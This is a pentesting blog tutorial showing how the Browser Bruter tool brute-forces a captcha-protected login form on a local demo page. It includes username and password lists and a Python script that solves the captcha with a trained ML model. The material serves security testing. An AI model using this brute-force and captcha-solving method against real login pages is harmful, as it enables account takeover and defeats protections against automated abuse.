Cracking The Captchas using Browser Bruter and Python

[Image Generated using AI Tools]

By Jafar Pathan

Without a doubt, captchas are one of the most critical security components of a web application, preventing automated bots from interacting with the application.

But they are also annoying during pentest and bug bounty engagements.

Thanks to the Browser Bruter's Python Scripting Engine, we can bypass such captchas using Machine Learning.

So buckle up as today I am going to demonstrate how you can bypass such captchas by utilizing the powerful Python Scripting Engine of the Browser Bruter.

Note: resources shown in this blog are all available within the 'res' directory of the Browser Bruter.

Setting up the Target Web Application

Let's first analyze our target. For demonstration purposes, I have developed a sample page with captcha logic, as shown in the image below -

altImage

To follow along, you can start this sample page by navigating to 'BrowserBruter/res/samples/captcha/' and running the following command -

python3 captcha.py

If you get the following error -

ModuleNotFoundError: No module named 'captcha'

just run the following command -

pip3 install captcha

If, while running the above command, you get an error like the following -

error: externally-managed-environment

run the following command -

pip3 install captcha --break-system-packages

and you are good to go. You should see output like the following -

altImage

Now navigate to http://127.0.0.1:5000 and you should see the sample web page as shown in image above.

Let's analyze the target web application.

altImage

This is a basic login form with an added captcha to prevent automated attacks.

It has three input fields: 1. Username 2. Password 3. Captcha

Note: As this is for demonstration purposes, the username and password for the web application are admin:admin, and a successful login will return a welcome response.

Take 1: Fuzzing Without Captcha Bypass

Let's run the Browser Bruter brute force attack against this form and analyze the behavior of the attack.

To perform the brute force attack, I have prepared the following payload lists:

usernames.txt:

portaladmin
admin@gmail.com
guest
admin
email@123.com

passwords.txt:

1234
super_strong_password
qesdgs6e56
wqwer
password
123123123
admin
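To get a feel for how many login attempts these two lists produce, here is a small sketch. It assumes the brute force attack tries every username with every password; that is my assumption for illustration, so check the Browser Bruter documentation for the exact behavior of each attack mode.

```python
from itertools import product

# Payload lists copied from usernames.txt and passwords.txt above.
usernames = ["portaladmin", "admin@gmail.com", "guest", "admin", "email@123.com"]
passwords = ["1234", "super_strong_password", "qesdgs6e56", "wqwer",
             "password", "123123123", "admin"]

# Assumption: every username is paired with every password.
attempts = list(product(usernames, passwords))

print(len(attempts))                   # 5 usernames x 7 passwords = 35
print(("admin", "admin") in attempts)  # True: the valid pair is among the attempts
```

So the valid admin:admin pair is covered only if the attack combines the lists this way, and each of those attempts has to get past the captcha.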

First let's build up the required options to run the attack.

--target: This will be 'http://127.0.0.1:5000/'.
--attack: As we are going to run a brute force attack, we will use attack mode 4.
--elements-payloads: I have found the ids of the elements, which are 'username' and 'password' respectively. So the option will be --elements-payloads username:usernames.txt,password:passwords.txt
--button: I have found the name of the 'login' button, which is 'submit', making our option --button submit
--fill: As the application requires the captcha field too, for now we will use the --fill option to fill it with a random value. I have found that its id is 'captcha_input'.

So our final command will be as follows:

python3 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --fill captcha_input
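If you prefer to assemble this command from a script (for example, to reuse it across targets), the following is a minimal sketch. The helper name build_command is hypothetical and not part of Browser Bruter; it only uses the options already discussed above.

```python
import shlex

# Element id -> payload file, as identified in the option list above.
element_payloads = {"username": "usernames.txt", "password": "passwords.txt"}

def build_command(target, attack, element_payloads, button, fill=None):
    """Assemble the BrowserBruter.py argument list (hypothetical helper)."""
    pairs = ",".join(f"{element}:{path}" for element, path in element_payloads.items())
    args = ["python3", "BrowserBruter.py",
            "--target", target,
            "--attack", str(attack),
            "--elements-payloads", pairs,
            "--button", button]
    if fill:
        args += ["--fill", fill]
    return args

command = build_command("http://127.0.0.1:5000/", 4, element_payloads,
                        "submit", fill="captcha_input")
print(shlex.join(command))
```

Keeping the arguments as a list means the same value can be passed straight to subprocess.run without worrying about shell quoting.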

Now let's run this and see the result:

altImage

The attack has finished and the report has been generated. Let's open this report in ReportExplorer.py

altImage

There is a lot of traffic, and it's impractical to analyze each request one by one to see whether we got a successful response.

To make things easier, thanks to the rich features of Browser Bruter, we can use the --grep option of ReportExplorer with the "welcome" keyword to search the HTTP traffic, because 'welcome', 'hello', 'success', and 'admin' are common keywords that appear in the successful response of a login page.

I will run following command for this:

python3 ReportExplorer.py --report </path/to/report.csv> --grep welcome
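Conceptually, this kind of keyword search boils down to scanning every row of the CSV report for the keyword. The sketch below illustrates the idea with the standard library only; it is not how ReportExplorer implements --grep, and the column names in the sample data are made up for the example.

```python
import csv
import io

def grep_rows(csv_file, keyword):
    """Return (header, rows) where any cell of a row contains keyword, ignoring case."""
    needle = keyword.lower()
    reader = csv.reader(csv_file)
    header = next(reader, None)
    matches = [row for row in reader
               if any(needle in cell.lower() for cell in row)]
    return header, matches

# Hypothetical report content; the columns of a real report will differ.
sample_report = io.StringIO(
    "payload,status,response_body\n"
    "guest:1234,200,Invalid captcha\n"
    "admin:admin,200,Welcome admin\n"
)

header, matches = grep_rows(sample_report, "welcome")
for row in matches:
    print(dict(zip(header, row)))
```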

altImage

Well, our attack has failed, and we know the reason: the captcha. Even though the payload lists contained the valid credentials, we were unsuccessful in brute forcing the login page.

Now, to brute force this login, we first have to bypass the captcha. Let's jump to it.

Take 2: Bypassing the Captcha

I have prepared and trained an ML model to crack this captcha. How did I train it? Well, that's a story for another time.

Today, we will integrate this Machine Learning model into Browser Bruter to extend its functionality and bypass this captcha.

To achieve this, I have written the following short Python script -


  import os
  import random
  import cv2
  import string
  from PIL import Image, ImageDraw, ImageFont
  from captcha.image import ImageCaptcha
  import numpy as np
  import tensorflow as tf
  from tensorflow.keras import layers, models
  from tensorflow.keras.utils import to_categorical
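  import requests
  # By is used below; imported explicitly in case the scripting engine does not already expose it
  from selenium.webdriver.common.by import By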
  
  # Function to preprocess and predict text from a sample captcha
  def predict_captcha(model, sample_captcha_path, label_to_int):
      # Load and preprocess the sample PNG captcha
      sample_captcha = cv2.imread(sample_captcha_path, cv2.IMREAD_GRAYSCALE)
      
      sample_captcha = cv2.resize(sample_captcha, (28 * 4, 28))
  
      # Chop the sample captcha into four characters
      character_width = 28
      characters = [sample_captcha[:, i:i + character_width] for i in range(0, sample_captcha.shape[1], character_width)]
  
      # Preprocess each character and make predictions
      predicted_text = ""
      for char_image in characters:
          char_image = char_image.reshape((1, 28, 28, 1)).astype("float32") / 255.0
          predictions = model.predict(char_image)
          predicted_label_idx = np.argmax(predictions)
          predicted_label = list(label_to_int.keys())[list(label_to_int.values()).index(predicted_label_idx)]
          predicted_text += predicted_label
  
      return predicted_text
  
  # Map labels to integers
  label_to_int = {char: idx for idx, char in enumerate(string.ascii_letters + string.digits)}
  num_classes = len(label_to_int)
  
  # Load the saved model
  model = tf.keras.models.load_model("res/samples/captcha_model.keras") # Change Here, Please provide correct path of the model
  # Re-compile the model to ensure metrics are set
  model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
  
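  # `driver` is not defined in this script; it is expected to be supplied by
  # Browser Bruter's Python Scripting Engine at run time.
  image_element = driver.find_element(By.ID, "captcha_image")
  img_url = image_element.get_attribute('src')
  
  # Download the captcha image so it can be fed to the model
  response = requests.get(img_url)
  with open('image.png', 'wb') as file:
      file.write(response.content)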
  
  # Example usage of the prediction function
  #sample_captcha_path = "sample.png"  # Change this to the path of your sample captcha
  predicted_text = predict_captcha(model, 'image.png', label_to_int)
  print("Predicted Text:", predicted_text)
  
  image_input_element = driver.find_element(By.ID, "captcha_input")
  
  image_input_element.clear()
  image_input_element.send_keys(predicted_text)

Below is the summary of what the above script is doing:

It imports libraries for image processing (cv2, PIL), machine learning (TensorFlow), and web requests (requests).
The main function predict_captcha processes and recognizes text from CAPTCHA images:
- Takes a CAPTCHA image as input
- Converts it to grayscale and resizes it
- Splits the image into individual characters
- Uses a neural network model to predict each character
- Combines the character predictions into the complete CAPTCHA text
The code creates a mapping between ASCII letters/digits and integers using label_to_int.
It loads a pre-trained Keras model from "res/samples/captcha_model.keras".
The script finds the CAPTCHA image on the webpage using Selenium's driver.find_element.
It downloads the CAPTCHA image from the extracted URL.
After prediction, it:
- Locates the input field for the CAPTCHA solution
- Clears any existing text
- Enters the predicted CAPTCHA text
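The splitting and decoding steps can be tried in isolation, without TensorFlow or a trained model. The sketch below reuses the same 62-character alphabet and 28-pixel character width as the script, but the score vectors are made up, and the int_to_label reverse mapping is my own addition (the script itself searches label_to_int on every prediction).

```python
import string

# Same alphabet as label_to_int in the script: a-z, A-Z, then 0-9.
CHARSET = string.ascii_letters + string.digits
label_to_int = {char: idx for idx, char in enumerate(CHARSET)}
int_to_label = {idx: char for char, idx in label_to_int.items()}

def slice_offsets(total_width=28 * 4, character_width=28):
    """Left edges of the fixed-width tiles the captcha is chopped into."""
    return list(range(0, total_width, character_width))

def decode(scores_per_character):
    """Pick the highest-scoring class for each character and join the labels."""
    text = ""
    for scores in scores_per_character:
        best = max(range(len(scores)), key=scores.__getitem__)  # plain argmax
        text += int_to_label[best]
    return text

def one_hot(char):
    """Made-up score vector that is fully confident about one character."""
    scores = [0.0] * len(CHARSET)
    scores[label_to_int[char]] = 1.0
    return scores

print(slice_offsets())                        # [0, 28, 56, 84]
print(decode([one_hot(c) for c in "aB3z"]))   # aB3z
```

In the real script, each score vector comes from model.predict on one 28x28 tile instead of one_hot.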

The above script requires several Python packages. To install them, run `pip3 install -r res/samples/requirements-for-ml-sample.txt`

Now that we are done with our script, let's import it into Browser Bruter. We can achieve this using the --python-file option, which Browser Bruter provides as a way to interact with its Python Scripting Engine.

So our command will be as follows:

python3.12 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --python-file res/samples/bb-predict.py --print-error

I have made the following changes to our original command:
- I have removed the --fill option, because we will enter the correct captcha in captcha_input using the Machine Learning model.
- I have added the --print-error option, because I want to see whether there are any issues with my Python script.

Now, let's run this bad boy:

altImage

Yeah, it's working, we are able to bypass the captcha by integrating Machine Learning into Browser Bruter.

Let's wait for the attack to finish.

altImage

It's done. Let me analyze the result.

altImage

And here it is: we found the credentials and successfully bypassed the captcha.

So, this is how you can leverage the Python Scripting Engine of Browser Bruter to do all kinds of crazy stuff and fuzz the unfuzzable.

Keep fuzzing! Keep Hacking!

Contact

If you have any questions, suggestions, or feedback, feel free to connect with me on:

Github: https://github.com/zinja-coder

LinkedIn: https://www.linkedin.com/in/jafar-pathan/

Twitter: https://x.com/zinja_coder

About: https://zinja-coder.github.io/

Threads: jafar.khan.pathan_
